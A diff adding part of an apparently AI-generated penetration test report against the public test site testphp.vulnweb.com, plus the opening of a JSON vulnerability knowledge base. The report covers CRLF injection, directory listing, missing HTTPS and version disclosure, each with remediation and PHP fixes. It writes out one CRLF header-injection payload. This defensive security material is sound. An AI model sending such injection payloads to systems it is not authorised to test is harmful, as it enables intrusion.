+From a compliance perspective, this vulnerability creates significant regulatory risks. Organizations handling payment card data would fail PCI-DSS requirements (specifically Requirement 4.1), which mandates encryption of cardholder data transmission over open networks. GDPR compliance may also be compromised as the regulation requires appropriate technical measures to protect personal data, and cleartext transmission fails to meet reasonable security standards. Additional regulatory frameworks such as HIPAA for healthcare data, SOX for financial reporting, and various industry-specific standards mandate encryption of data in transit, making this vulnerability a critical compliance violation.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement HTTPS with proper TLS configuration**: Deploy a valid SSL/TLS certificate and configure the web server to serve the application exclusively over HTTPS. Use TLS 1.2 or higher with strong cipher suites. Remove or disable HTTP listeners entirely, or configure them to redirect all requests to HTTPS endpoints using 301/302 redirects.
+
+2. **Enforce HTTP Strict Transport Security (HSTS)**: Add the Strict-Transport-Security header to all HTTPS responses to prevent protocol downgrade attacks. Example header: `Strict-Transport-Security: max-age=31536000; includeSubDomains; preload`. Consider submitting the domain to the HSTS preload list for maximum protection.
+
+3. **Configure secure redirects and URL rewriting**: Ensure all HTTP requests are automatically redirected to HTTPS equivalents. Implement server-level redirects (Apache mod_rewrite, Nginx rewrite rules) or application-level redirects. Update all internal links, forms, and references to use HTTPS URLs exclusively.
+
+4. **Implement Content Security Policy (CSP)**: Deploy CSP headers that include the `upgrade-insecure-requests` directive to automatically upgrade HTTP resource requests to HTTPS. Example: `Content-Security-Policy: upgrade-insecure-requests; default-src &#39;self&#39; https:`.
+
+5. **Review and update external dependencies**: Audit all third-party integrations, APIs, and external resources to ensure they support HTTPS. Update any hardcoded HTTP URLs in configuration files, source code, and documentation. Implement proper certificate validation for all outbound HTTPS connections.
+
+6. **Deploy additional security headers**: Implement complementary security headers including `X-Content-Type-Options: nosniff`, `X-Frame-Options: DENY`, and `Referrer-Policy: strict-origin-when-cross-origin` to provide defense-in-depth protection alongside HTTPS enforcement.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>CRLF Injection / HTTP Response Splitting</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> crlf_injection</span>
+                    <span><strong>CWE:</strong> CWE-93</span>
+                    <span><strong>CVSS:</strong> 6.1</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=%250d%250aX-Injected:neurosploit</p>
+                    <p><strong>Description:</strong> A CRLF (Carriage Return Line Feed) injection vulnerability was identified in the &#39;cat&#39; parameter of the listproducts.php endpoint. This vulnerability allows attackers to inject arbitrary HTTP headers into server responses by manipulating line breaks in the HTTP protocol. The vulnerability was confirmed by successfully injecting a custom &#39;X-Injected&#39; header using URL-encoded CRLF characters (%0d%0a).
+
+CRLF injection occurs when user input containing carriage return and line feed characters is reflected in HTTP response headers without proper sanitization. In this case, the application appears to process the &#39;cat&#39; parameter and include it in the response in a way that allows header injection. The payload %0d%0aX-Injected:neurosploit successfully demonstrates the ability to inject arbitrary headers, which could be leveraged for more sophisticated attacks including HTTP response splitting, cache poisoning, or cross-site scripting (XSS) via header manipulation.
+
+The evidence also suggests potential SQL injection vulnerabilities in the same parameter, as SQL error patterns were observed in responses. This indicates that the parameter may be processed by database queries without proper sanitization, creating a compound vulnerability scenario where both CRLF injection and SQL injection may be possible through the same attack vector.</p>
+                    <p><strong>Impact:</strong> The CRLF injection vulnerability could allow attackers to manipulate HTTP responses and potentially compromise user sessions or application integrity. Attackers could inject malicious headers to perform HTTP response splitting attacks, leading to cache poisoning where malicious content is stored in proxy caches and served to other users. This could result in defacement, malware distribution, or credential theft.
+
+The ability to inject arbitrary headers also enables session fixation attacks, where attackers can manipulate session cookies or authentication tokens. In combination with the potential SQL injection vulnerability in the same parameter, attackers could potentially extract sensitive data from the database, modify application data, or gain unauthorized access to user accounts. From a compliance perspective, this vulnerability could result in violations of PCI-DSS requirements (particularly sections 6.5.1 and 6.5.7) if the application processes payment card data, and may constitute a data protection breach under GDPR if personal data is compromised through SQL injection exploitation.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A CRLF (Carriage Return Line Feed) injection vulnerability was identified in the &#39;cat&#39; parameter of the listproducts.php endpoint. This vulnerability allows attackers to inject arbitrary HTTP headers into server responses by manipulating line breaks in the HTTP protocol. The vulnerability was confirmed by successfully injecting a custom &#39;X-Injected&#39; header using URL-encoded CRLF characters (%0d%0a).
+
+CRLF injection occurs when user input containing carriage return and line feed characters is reflected in HTTP response headers without proper sanitization. In this case, the application appears to process the &#39;cat&#39; parameter and include it in the response in a way that allows header injection. The payload %0d%0aX-Injected:neurosploit successfully demonstrates the ability to inject arbitrary headers, which could be leveraged for more sophisticated attacks including HTTP response splitting, cache poisoning, or cross-site scripting (XSS) via header manipulation.
+
+The evidence also suggests potential SQL injection vulnerabilities in the same parameter, as SQL error patterns were observed in responses. This indicates that the parameter may be processed by database queries without proper sanitization, creating a compound vulnerability scenario where both CRLF injection and SQL injection may be possible through the same attack vector.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to crlf_injection based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>%0d%0aX-Injected:neurosploit</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>The CRLF injection vulnerability could allow attackers to manipulate HTTP responses and potentially compromise user sessions or application integrity. Attackers could inject malicious headers to perform HTTP response splitting attacks, leading to cache poisoning where malicious content is stored in proxy caches and served to other users. This could result in defacement, malware distribution, or credential theft.
+
+The ability to inject arbitrary headers also enables session fixation attacks, where attackers can manipulate session cookies or authentication tokens. In combination with the potential SQL injection vulnerability in the same parameter, attackers could potentially extract sensitive data from the database, modify application data, or gain unauthorized access to user accounts. From a compliance perspective, this vulnerability could result in violations of PCI-DSS requirements (particularly sections 6.5.1 and 6.5.7) if the application processes payment card data, and may constitute a data protection breach under GDPR if personal data is compromised through SQL injection exploitation.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Input Validation and Sanitization**: Implement strict input validation for the &#39;cat&#39; parameter and all user-supplied data. Reject any input containing CRLF characters (\r\n, %0d%0a) or other control characters. Use allowlists to define acceptable characters and patterns for each parameter.
+
+2. **Output Encoding**: Ensure all user input is properly encoded before being included in HTTP headers or responses. Use appropriate encoding functions provided by the web framework, such as `htmlspecialchars()` in PHP or equivalent functions in other languages.
+
+3. **HTTP Header Security**: Never directly concatenate user input into HTTP headers. If dynamic header generation is required, use framework-provided header manipulation functions that automatically handle escaping and validation.
+
+4. **Code Example (PHP)**:
+```php
+// BAD - Vulnerable to CRLF injection
+$category = $_GET[&#39;cat&#39;];
+header(&quot;X-Category: &quot; . $category);
+
+// GOOD - Properly sanitized
+$category = filter_input(INPUT_GET, &#39;cat&#39;, FILTER_SANITIZE_STRING);
+$category = preg_replace(&#39;/[\r\n]/&#39;, &#39;&#39;, $category); // Remove CRLF
+if (ctype_alnum($category)) {
+    header(&quot;X-Category: &quot; . $category);
+}
+```
+
+5. **SQL Injection Prevention**: Given the evidence of SQL errors, implement parameterized queries (prepared statements) for all database interactions. Example:
+```php
+// Use prepared statements
+$stmt = $pdo-&gt;prepare(&quot;SELECT * FROM products WHERE category = ?&quot;);
+$stmt-&gt;execute([$category]);
+```
+
+6. **Security Headers**: Implement security headers such as `X-Frame-Options`, `X-Content-Type-Options`, and `Content-Security-Policy` to provide defense-in-depth protection against header manipulation attacks.
+
+7. **Web Application Firewall (WAF)**: Deploy a WAF to filter malicious requests and provide an additional layer of protection against injection attacks.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #17a2b8;">LOW</span>
+                    <h3>Directory Listing Enabled</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> directory_listing</span>
+                    <span><strong>CWE:</strong> CWE-548</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/images/</p>
+                    <p><strong>Description:</strong> A directory listing vulnerability was identified on the target web application at http://testphp.vulnweb.com/images/. This vulnerability occurs when the web server is configured to display the contents of directories that do not contain an index file (such as index.html, index.php, or default.htm), allowing unauthorized users to browse and enumerate files and subdirectories within the web root.
+
+The vulnerability was discovered by directly accessing the /images/ directory path, which responded with an auto-generated directory listing page instead of returning a 403 Forbidden or 404 Not Found error. This misconfiguration typically stems from improper web server configuration where directory indexes are enabled globally or for specific directories without proper access controls.
+
+In this specific instance, the /images/ directory exposes its entire contents to any remote user without authentication. This allows attackers to enumerate potentially sensitive files, understand the application&#39;s structure, and identify additional attack vectors such as backup files, configuration files, or other resources that should not be publicly accessible.</p>
+                    <p><strong>Impact:</strong> The exposure of directory listings presents several security risks to the organization. Attackers can enumerate sensitive files that may contain configuration details, backup files with source code, database credentials, or other confidential information. This information disclosure can facilitate further attacks by revealing the application&#39;s internal structure, file naming conventions, and potential entry points for more serious vulnerabilities.
+
+From a compliance perspective, this vulnerability may violate data protection regulations such as GDPR Article 32 (Security of processing) if personal data is inadvertently exposed through accessible files. Organizations subject to PCI-DSS compliance may also face violations under Requirement 2.2.4, which mandates the removal of unnecessary functionality that could provide unauthorized access to system components. The business impact includes potential data breaches, intellectual property theft, and reputational damage if sensitive corporate information becomes publicly accessible through directory traversal.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Disable Directory Indexes**: Configure the web server to disable directory browsing. For Apache servers, add &#39;Options -Indexes&#39; to the .htaccess file or virtual host configuration. For Nginx, ensure the &#39;autoindex off;&#39; directive is set in the server configuration.
+
+2. **Implement Default Index Files**: Place default index files (index.html, index.php, or default.htm) in all directories that should not display listings. Even an empty index file will prevent directory enumeration.
+
+3. **Configure Custom Error Pages**: Implement custom 403 Forbidden error pages for directories without index files to provide a consistent user experience while preventing information disclosure.
+
+4. **Web Server Configuration Examples**:
+   - Apache: Add to .htaccess or virtual host: &#39;Options -Indexes -MultiViews&#39;
+   - Nginx: Add to server block: &#39;autoindex off; location ~ /\. { deny all; }&#39;
+   - IIS: Disable directory browsing in the Directory Security settings
+
+5. **Implement Access Controls**: Use web server access controls to restrict access to sensitive directories. Configure authentication requirements for administrative or sensitive file locations.
+
+6. **Regular Security Auditing**: Implement automated scanning tools to regularly check for directory listing vulnerabilities as part of the continuous security monitoring process.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #6c757d;">INFO</span>
+                    <h3>Server Version Disclosure</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sensitive_data_exposure</span>
+                    <span><strong>CWE:</strong> CWE-200</span>
+                    <span><strong>CVSS:</strong> 3.1</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> A server version disclosure vulnerability was identified on the target application at http://testphp.vulnweb.com/. The web server is exposing detailed version information (nginx/1.19.0) in HTTP response headers, specifically through the &#39;Server&#39; header field. This information disclosure occurs on every HTTP response from the server, making it readily accessible to any client making requests to the application.
+
+The vulnerability was discovered during routine HTTP header analysis, where the server&#39;s response headers were examined for information leakage. The nginx web server is configured to include its specific version number (1.19.0) in the Server header, which provides attackers with precise information about the underlying infrastructure. This level of detail allows potential attackers to research known vulnerabilities specific to this exact version of nginx and craft targeted attacks accordingly.
+
+While this vulnerability does not directly compromise the application&#39;s functionality or data, it significantly reduces the security through obscurity and provides valuable reconnaissance information that can be leveraged in subsequent attack phases. The disclosed version information can be used to identify known CVEs, default configurations, and potential attack vectors specific to nginx 1.19.0.</p>
+                    <p><strong>Impact:</strong> The exposure of specific server version information provides attackers with valuable intelligence for reconnaissance and targeted attacks. With knowledge that the server is running nginx version 1.19.0, attackers can research and identify known vulnerabilities, security advisories, and exploit code specific to this version. This information significantly reduces the effort required for attackers to develop effective attack strategies and increases the likelihood of successful exploitation of any underlying vulnerabilities.
+
+From a compliance perspective, many security frameworks and standards (including PCI-DSS requirement 2.2.5 and NIST guidelines) recommend removing or obfuscating version information to reduce attack surface. The disclosure of version information may be flagged during compliance audits and could contribute to failing security assessments. While the immediate risk is informational, this vulnerability often appears alongside other more critical security issues and represents a failure in security hardening practices that could indicate broader security configuration weaknesses across the infrastructure.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Configure nginx to suppress version information**: Modify the nginx configuration file (/etc/nginx/nginx.conf) to include &#39;server_tokens off;&#39; directive in the http block. This prevents nginx from displaying version information in the Server header and error pages.
+
+2. **Implement custom Server header**: Configure a generic Server header value that doesn&#39;t reveal specific software or version information. Use directives like &#39;more_set_headers &quot;Server: WebServer&quot;;&#39; with the nginx headers-more module, or &#39;add_header Server &quot;WebServer&quot; always;&#39; to override the default header.
+
+3. **Use a reverse proxy or load balancer**: Deploy a reverse proxy (such as CloudFlare, AWS ALB, or dedicated WAF) in front of the nginx server to strip or modify response headers before they reach clients. Configure the proxy to remove or replace the Server header with a generic value.
+
+4. **Regular security hardening**: Implement a comprehensive server hardening checklist that includes header security, disable unnecessary modules, remove default pages, and follow nginx security best practices. Regularly update nginx to the latest stable version and monitor security advisories.
+
+5. **Security header policy**: Implement a comprehensive security header policy that includes not only removing version disclosure but also adding protective headers like X-Content-Type-Options, X-Frame-Options, and Content-Security-Policy to enhance overall security posture.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #6c757d;">INFO</span>
+                    <h3>Technology Version Disclosure</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sensitive_data_exposure</span>
+                    <span><strong>CWE:</strong> CWE-200</span>
+                    <span><strong>CVSS:</strong> 3.7</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> A technology version disclosure vulnerability was identified on the application hosted at http://testphp.vulnweb.com/. The server is configured to expose detailed version information through the X-Powered-By HTTP response header, revealing that the application is running PHP version 5.6.40-38+ubuntu20.04.1+deb.sury.org+1. This information disclosure occurs on every HTTP response from the server, providing attackers with valuable intelligence about the underlying technology stack without requiring authentication or special privileges.
+
+The vulnerability manifests through the automatic inclusion of the X-Powered-By header in HTTP responses, which is a default behavior in many web server configurations. This header explicitly reveals not only the programming language (PHP) and its exact version (5.6.40), but also detailed information about the Ubuntu distribution version (20.04.1) and the package repository source (deb.sury.org). Such granular version information significantly aids attackers in reconnaissance activities and targeted exploit development.
+
+The disclosed PHP version (5.6.40) is particularly concerning as PHP 5.6 reached end-of-life in December 2018 and no longer receives security updates. This makes the application potentially vulnerable to numerous known security flaws that have been discovered since the version&#39;s discontinuation, creating a compound security risk beyond the information disclosure itself.</p>
+                    <p><strong>Impact:</strong> The exposure of detailed technology version information provides attackers with a roadmap for targeted exploitation attempts. With knowledge of the specific PHP version (5.6.40), attackers can research and deploy known exploits that affect this outdated version, significantly reducing the time and effort required for successful attacks. The end-of-life status of PHP 5.6 means there are likely multiple unpatched vulnerabilities that can be exploited.
+
+From a business perspective, this vulnerability increases the attack surface and makes the application a more attractive target for automated scanning tools and opportunistic attackers. The information disclosure could facilitate more sophisticated attacks including remote code execution, data breaches, or complete system compromise if combined with other vulnerabilities. Organizations subject to compliance frameworks such as PCI-DSS, GDPR, or HIPAA may face regulatory scrutiny for running outdated, unsupported software versions that could compromise sensitive data protection requirements.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Disable X-Powered-By Header**: Configure the web server to suppress the X-Powered-By header. For Apache servers with PHP, add &#39;expose_php = Off&#39; to the php.ini configuration file. For Nginx, ensure the &#39;server_tokens&#39; directive is set to &#39;off&#39;. For IIS servers, remove or modify the X-Powered-By header through the web.config file using the &lt;httpProtocol&gt; section.
+
+2. **Upgrade PHP Version**: Immediately upgrade from PHP 5.6.40 to a supported version such as PHP 8.1 or 8.2. PHP 5.6 reached end-of-life in December 2018 and contains numerous unpatched security vulnerabilities. Plan for regular updates following the PHP release cycle to maintain security posture.
+
+3. **Implement Security Headers**: Configure security-focused HTTP headers including &#39;Server&#39; header suppression, and implement a comprehensive Content Security Policy (CSP). Use tools like securityheaders.com to validate your header configuration.
+
+4. **Web Application Firewall (WAF)**: Deploy a WAF solution that can strip or modify response headers before they reach clients. Configure rules to remove technology-revealing headers while maintaining application functionality.
+
+5. **Regular Security Audits**: Implement automated security scanning to detect information disclosure vulnerabilities and ensure configuration changes persist through deployments and updates.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+        </div>
+
+        <div class="footer">
+            <p>Generated by NeuroSploit v3 - AI-Powered Penetration Testing Platform</p>
+        </div>
+    </div>
+</body>
+</html>
\ No newline at end of file
diff --git a/data/vuln_knowledge_base.json b/data/vuln_knowledge_base.json
new file mode 100644
index 0000000..ed63929
--- /dev/null
+++ b/data/vuln_knowledge_base.json
@@ -0,0 +1,1360 @@
+{
+  "version": "2.0",
+  "source": "VulnerabilityRegistry v2 (100 types) + XBOW benchmark insights",
+  "vulnerability_types": {
+    "xss_reflected": {
+      "title": "Reflected Cross-Site Scripting (XSS)",
+      "severity": "medium",
+      "cwe_id": "CWE-79",
+      "description": "Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser.",
+      "impact": "An attacker can execute arbitrary JavaScript in the victim's browser, potentially stealing session cookies, capturing credentials, or performing actions on behalf of the user.",
+      "remediation": "1. Encode all user input when rendering in HTML context\n2. Use Content-Security-Policy headers\n3. Set HttpOnly flag on sensitive cookies\n4. Use modern frameworks with auto-escaping",
+      "has_tester": true,
+      "false_positive_markers": [
+        "&lt;",
+        "&gt;",
+        "&amp;",
+        "Content-Security-Policy"
+      ]
+    },
+    "xss_stored": {
+      "title": "Stored Cross-Site Scripting (XSS)",
+      "severity": "high",
+      "cwe_id": "CWE-79",
+      "description": "Stored XSS occurs when malicious script is permanently stored on the target server, such as in a database, message forum, visitor log, or comment field.",
+      "impact": "All users who view the affected page will execute the malicious script, leading to mass credential theft, session hijacking, or malware distribution.",
+      "remediation": "1. Sanitize and validate all user input before storage\n2. Encode output when rendering\n3. Implement Content-Security-Policy\n4. Use HttpOnly and Secure flags on cookies",
+      "has_tester": true,
+      "false_positive_markers": [
+        "&lt;",
+        "&gt;",
+        "sanitized"
+      ]
+    },
+    "xss_dom": {
+      "title": "DOM-based Cross-Site Scripting",
+      "severity": "medium",
+      "cwe_id": "CWE-79",
+      "description": "DOM-based XSS occurs when client-side JavaScript processes user input and writes it to the DOM in an unsafe way.",
+      "impact": "Attacker can execute JavaScript in the user's browser through malicious links or user interaction.",
+      "remediation": "1. Avoid using dangerous DOM sinks (innerHTML, eval, document.write)\n2. Use textContent instead of innerHTML\n3. Sanitize user input on the client side\n4. Implement CSP with strict policies",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "sqli_error": {
+      "title": "Error-based SQL Injection",
+      "severity": "critical",
+      "cwe_id": "CWE-89",
+      "description": "SQL injection vulnerability that reveals database errors containing query information, allowing attackers to extract data through error messages.",
+      "impact": "Complete database compromise including data theft, modification, or deletion. May lead to remote code execution on the database server.",
+      "remediation": "1. Use parameterized queries/prepared statements\n2. Implement input validation with whitelist approach\n3. Apply least privilege principle for database accounts\n4. Disable detailed error messages in production",
+      "has_tester": true,
+      "false_positive_markers": [
+        "parameterized",
+        "prepared statement",
+        "PDO"
+      ]
+    },
+    "sqli_union": {
+      "title": "Union-based SQL Injection",
+      "severity": "critical",
+      "cwe_id": "CWE-89",
+      "description": "SQL injection allowing UNION-based queries to extract data from other database tables.",
+      "impact": "Full database extraction capability. Attacker can read all database tables, users, and potentially escalate to RCE.",
+      "remediation": "1. Use parameterized queries exclusively\n2. Implement strict input validation\n3. Use stored procedures where appropriate\n4. Monitor for unusual query patterns",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "sqli_blind": {
+      "title": "Blind SQL Injection (Boolean-based)",
+      "severity": "high",
+      "cwe_id": "CWE-89",
+      "description": "SQL injection where results are inferred from application behavior changes rather than direct output.",
+      "impact": "Slower but complete data extraction is possible. Can lead to full database compromise.",
+      "remediation": "1. Use parameterized queries\n2. Implement WAF rules for SQL injection patterns\n3. Use connection pooling with timeout limits\n4. Implement query logging and monitoring",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "sqli_time": {
+      "title": "Time-based Blind SQL Injection",
+      "severity": "high",
+      "cwe_id": "CWE-89",
+      "description": "SQL injection where attacker can infer information based on time delays in responses.",
+      "impact": "Complete data extraction possible, though slower. Can determine database structure and content.",
+      "remediation": "1. Use parameterized queries\n2. Set strict query timeout limits\n3. Monitor for anomalously slow queries\n4. Implement rate limiting",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "command_injection": {
+      "title": "OS Command Injection",
+      "severity": "critical",
+      "cwe_id": "CWE-78",
+      "description": "Application passes unsafe user-supplied data to a system shell, allowing execution of arbitrary OS commands.",
+      "impact": "Complete system compromise. Attacker can execute any command with the application's privileges, potentially gaining full server access.",
+      "remediation": "1. Avoid shell commands; use native library functions\n2. If shell required, use strict whitelist validation\n3. Never pass user input directly to shell\n4. Run with minimal privileges, use containers",
+      "has_tester": true,
+      "false_positive_markers": [
+        "escapeshellarg",
+        "escapeshellcmd"
+      ]
+    },
+    "ssti": {
+      "title": "Server-Side Template Injection",
+      "severity": "critical",
+      "cwe_id": "CWE-94",
+      "description": "User input is unsafely embedded into server-side templates, allowing template code execution.",
+      "impact": "Often leads to remote code execution. Attacker can read files, execute commands, and compromise the server.",
+      "remediation": "1. Never pass user input to template engines\n2. Use logic-less templates when possible\n3. Implement sandbox environments for templates\n4. Validate and sanitize all template inputs",
+      "has_tester": true,
+      "false_positive_markers": [
+        "autoescape",
+        "sandbox"
+      ]
+    },
+    "nosql_injection": {
+      "title": "NoSQL Injection",
+      "severity": "high",
+      "cwe_id": "CWE-943",
+      "description": "Injection attack targeting NoSQL databases like MongoDB through operator injection.",
+      "impact": "Authentication bypass, data theft, and potential server compromise depending on database configuration.",
+      "remediation": "1. Validate and sanitize all user input\n2. Use parameterized queries where available\n3. Disable server-side JavaScript execution\n4. Apply strict typing to query parameters",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "lfi": {
+      "title": "Local File Inclusion",
+      "severity": "high",
+      "cwe_id": "CWE-98",
+      "description": "Application includes local files based on user input, allowing access to sensitive files.",
+      "impact": "Read sensitive configuration files, source code, and potentially achieve code execution via log poisoning.",
+      "remediation": "1. Avoid dynamic file inclusion\n2. Use whitelist of allowed files\n3. Validate and sanitize file paths\n4. Implement proper access controls",
+      "has_tester": true,
+      "false_positive_markers": [
+        "open_basedir",
+        "chroot",
+        "permission denied"
+      ]
+    },
+    "rfi": {
+      "title": "Remote File Inclusion",
+      "severity": "critical",
+      "cwe_id": "CWE-98",
+      "description": "Application includes remote files, allowing execution of attacker-controlled code.",
+      "impact": "Direct remote code execution. Complete server compromise.",
+      "remediation": "1. Disable allow_url_include in PHP\n2. Use whitelists for file inclusion\n3. Never use user input in include paths\n4. Implement strict input validation",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "path_traversal": {
+      "title": "Path Traversal",
+      "severity": "high",
+      "cwe_id": "CWE-22",
+      "description": "Application allows navigation outside intended directory through ../ sequences.",
+      "impact": "Access to sensitive files outside web root, including configuration files and source code.",
+      "remediation": "1. Validate and sanitize file paths\n2. Use basename() to strip directory components\n3. Implement chroot or containerization\n4. Use whitelist of allowed directories",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "xxe": {
+      "title": "XML External Entity Injection",
+      "severity": "high",
+      "cwe_id": "CWE-611",
+      "description": "XML parser processes external entity references, allowing file access or SSRF.",
+      "impact": "Read local files, perform SSRF attacks, and potentially achieve denial of service.",
+      "remediation": "1. Disable external entity processing\n2. Use JSON instead of XML where possible\n3. Validate and sanitize XML input\n4. Use updated XML parsers with secure defaults",
+      "has_tester": true,
+      "false_positive_markers": [
+        "disableExternalEntities",
+        "FEATURE_EXTERNAL"
+      ]
+    },
+    "file_upload": {
+      "title": "Arbitrary File Upload",
+      "severity": "high",
+      "cwe_id": "CWE-434",
+      "description": "Application allows uploading of dangerous file types that can be executed.",
+      "impact": "Upload of web shells leading to remote code execution and complete server compromise.",
+      "remediation": "1. Validate file type using magic bytes\n2. Rename uploaded files\n3. Store outside web root\n4. Disable execution in upload directory",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "ssrf": {
+      "title": "Server-Side Request Forgery",
+      "severity": "high",
+      "cwe_id": "CWE-918",
+      "description": "Application makes requests to attacker-specified URLs, accessing internal resources.",
+      "impact": "Access to internal services, cloud metadata, and potential for pivoting to internal networks.",
+      "remediation": "1. Implement URL whitelist\n2. Block requests to internal IPs\n3. Disable unnecessary URL schemes\n4. Use network segmentation",
+      "has_tester": true,
+      "false_positive_markers": [
+        "blocked",
+        "denied",
+        "filtered"
+      ]
+    },
+    "ssrf_cloud": {
+      "title": "SSRF to Cloud Metadata",
+      "severity": "critical",
+      "cwe_id": "CWE-918",
+      "description": "SSRF vulnerability allowing access to cloud provider metadata services.",
+      "impact": "Credential theft, full cloud account compromise, lateral movement in cloud infrastructure.",
+      "remediation": "1. Block requests to metadata IPs\n2. Use IMDSv2 (AWS) or equivalent\n3. Implement strict URL validation\n4. Use firewall rules for metadata endpoints",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "csrf": {
+      "title": "Cross-Site Request Forgery",
+      "severity": "medium",
+      "cwe_id": "CWE-352",
+      "description": "Application allows state-changing requests without proper origin validation.",
+      "impact": "Attacker can perform actions as authenticated users, including transfers, password changes, or data modification.",
+      "remediation": "1. Implement anti-CSRF tokens\n2. Verify Origin/Referer headers\n3. Use SameSite cookie attribute\n4. Require re-authentication for sensitive actions",
+      "has_tester": true,
+      "false_positive_markers": [
+        "csrf_token",
+        "_token",
+        "authenticity_token"
+      ]
+    },
+    "auth_bypass": {
+      "title": "Authentication Bypass",
+      "severity": "critical",
+      "cwe_id": "CWE-287",
+      "description": "Authentication mechanisms can be bypassed through various techniques.",
+      "impact": "Complete unauthorized access to user accounts and protected resources.",
+      "remediation": "1. Implement proper authentication checks on all routes\n2. Use proven authentication frameworks\n3. Implement account lockout\n4. Use MFA for sensitive accounts",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "jwt_manipulation": {
+      "title": "JWT Token Manipulation",
+      "severity": "high",
+      "cwe_id": "CWE-347",
+      "description": "JWT implementation vulnerabilities allowing token forgery or manipulation.",
+      "impact": "Authentication bypass, privilege escalation, and identity impersonation.",
+      "remediation": "1. Always verify JWT signatures\n2. Use strong signing algorithms (RS256)\n3. Validate all claims including exp and iss\n4. Implement token refresh mechanisms",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "session_fixation": {
+      "title": "Session Fixation",
+      "severity": "medium",
+      "cwe_id": "CWE-384",
+      "description": "Application accepts session tokens from URL parameters or doesn't regenerate after login.",
+      "impact": "Attacker can hijack user sessions by fixing known session IDs.",
+      "remediation": "1. Regenerate session ID after login\n2. Only accept session from cookies\n3. Implement secure session management\n4. Use short session timeouts",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "idor": {
+      "title": "Insecure Direct Object Reference",
+      "severity": "high",
+      "cwe_id": "CWE-639",
+      "description": "Application exposes internal object IDs without proper authorization checks.",
+      "impact": "Unauthorized access to other users' data, potentially exposing sensitive information.",
+      "remediation": "1. Implement proper authorization checks\n2. Use indirect references or UUIDs\n3. Validate user ownership of resources\n4. Implement access control lists",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "bola": {
+      "title": "Broken Object Level Authorization",
+      "severity": "high",
+      "cwe_id": "CWE-639",
+      "description": "API endpoints don't properly validate object-level permissions.",
+      "impact": "Access to any object by manipulating IDs, leading to mass data exposure.",
+      "remediation": "1. Implement object-level authorization\n2. Validate permissions on every request\n3. Use authorization middleware\n4. Log and monitor access patterns",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "privilege_escalation": {
+      "title": "Privilege Escalation",
+      "severity": "critical",
+      "cwe_id": "CWE-269",
+      "description": "User can elevate privileges to access higher-level functionality.",
+      "impact": "User can gain admin access, access to all data, and full system control.",
+      "remediation": "1. Implement role-based access control\n2. Validate roles on every request\n3. Use principle of least privilege\n4. Monitor for privilege escalation attempts",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "cors_misconfig": {
+      "title": "CORS Misconfiguration",
+      "severity": "medium",
+      "cwe_id": "CWE-942",
+      "description": "Overly permissive CORS policy allows cross-origin requests from untrusted domains.",
+      "impact": "Cross-origin data theft and unauthorized API access from malicious websites.",
+      "remediation": "1. Implement strict origin whitelist\n2. Avoid Access-Control-Allow-Origin: *\n3. Validate Origin header server-side\n4. Don't reflect Origin without validation",
+      "has_tester": true,
+      "false_positive_markers": [
+        "Vary: Origin"
+      ]
+    },
+    "clickjacking": {
+      "title": "Clickjacking",
+      "severity": "medium",
+      "cwe_id": "CWE-1021",
